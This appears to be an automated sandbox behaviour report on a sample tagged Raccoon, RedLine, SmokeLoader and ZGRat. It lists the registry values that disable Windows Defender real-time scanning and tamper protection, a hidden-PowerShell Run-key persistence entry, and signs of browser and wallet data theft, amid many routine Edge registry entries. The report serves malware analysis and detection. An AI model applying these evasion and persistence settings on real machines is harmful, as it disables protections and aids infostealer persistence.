Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E6CA.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\15BA.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C005.exe'\"" C:\Users\Admin\AppData\Local\Temp\C005.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\11FC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\C1CB.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "404982368" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 3e14f95dff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{39FD6752-6DDF-45A7-B17E-D5A51178B0AA} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000bd48410b8df8eb0f07e50b68662b3ca095342b9d11854e40924fc3a90ebcb8d2a5120dced63ae246493e9cf3dad8fd5492d09f67e0c9cce30861 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = da0af65bff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = b07b7b6cff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d3a4a856ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8d5b806cff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
